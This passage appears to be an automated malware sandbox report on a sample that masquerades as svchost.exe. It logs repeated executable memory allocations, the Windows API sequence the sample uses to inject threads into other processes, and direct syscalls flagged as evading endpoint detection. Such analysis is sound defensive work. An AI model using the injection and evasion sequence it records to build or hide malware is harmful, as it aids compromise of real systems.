Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1340000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1580000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: E10000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: FD0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 880000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A50000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: DF0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: E90000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 9F0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1460000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 13A0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 15D0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1380000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 620000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1200000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1590000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1440000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: FF0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 10D0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: F60000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: B90000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: D60000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1320000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 600000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: DB0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A30000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1000000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: F20000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 860000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 9D0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11D0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 870000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: D70000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 810000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 8D0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: AD0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1210000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1170000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: DB0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1090000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A00000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 780000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 920000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 860000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 840000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: AC0000 protect: page execute and read and writeJump to behavior
Contains functionality to inject threads in other processes
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_00401580 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,0_2_00401580
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00401580 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,2_2_00401580
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C93240 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,2_2_02C93240
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_01263240 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,6_2_01263240
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_01063240 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,7_2_01063240
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A43240 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,9_2_00A43240
Creates a thread in another existing process (thread injection)
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe EIP: 11E1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe EIP: FE1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe EIP: 9C1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe EIP: 2EA1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe EIP: 2AF1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe EIP: 11D1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe EIP: 2AB1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe EIP: 24F1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe EIP: 2E81360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe EIP: 25F1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe EIP: 2671360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe EIP: 1551360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe EIP: CD1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1541360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1071360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1471360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1221360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 9B1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 601360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: FE1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 941360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: F71360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1571360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 10E1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1221360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1251360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 11B1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: AC1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1401360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 14A1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1021360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1191360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1551360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: A21360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: CB1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 11A1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1341360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1581360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: E11360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: FD1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 881360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: A51360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: DF1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: E91360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 9F1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1461360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 13A1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 15D1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1381360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 621360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1201360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1591360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1441360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: FF1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 10D1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: F61360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: B91360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: D61360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1321360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 601360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: DB1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: A31360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1001360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: F21360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 861360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 9D1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 11D1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 871360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: D71360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 811360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 8D1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: AD1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1211360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1171360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: DB1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1091360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: A01360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 781360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 921360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 861360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 841360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: AC1360Jump to behavior
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtResumeThread: Direct from: 0x773836AC
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtMapViewOfSection: Direct from: 0x77382D1C
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtProtectVirtualMemory: Direct from: 0x77382F9C
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtSetInformationThread: Direct from: 0x773763F9
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtUnmapViewOfSection: Direct from: 0x77382D3C
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtCreateMutant: Direct from: 0x773835CC
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtNotifyChangeKey: Direct from: 0x77383C2C
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtSetInformationProcess: Direct from: 0x77382C5C
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtQueryInformationProcess: Direct from: 0x77382C26
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtEnumerateKey: Direct from: 0x77382DBC
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtAllocateVirtualMemory: Direct from: 0x77383C9C
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtAllocateVirtualMemory: Direct from: 0x77382BFC
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtWriteFile: Direct from: 0x77382AFC
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtDelayExecution: Direct from: 0x77382DDC
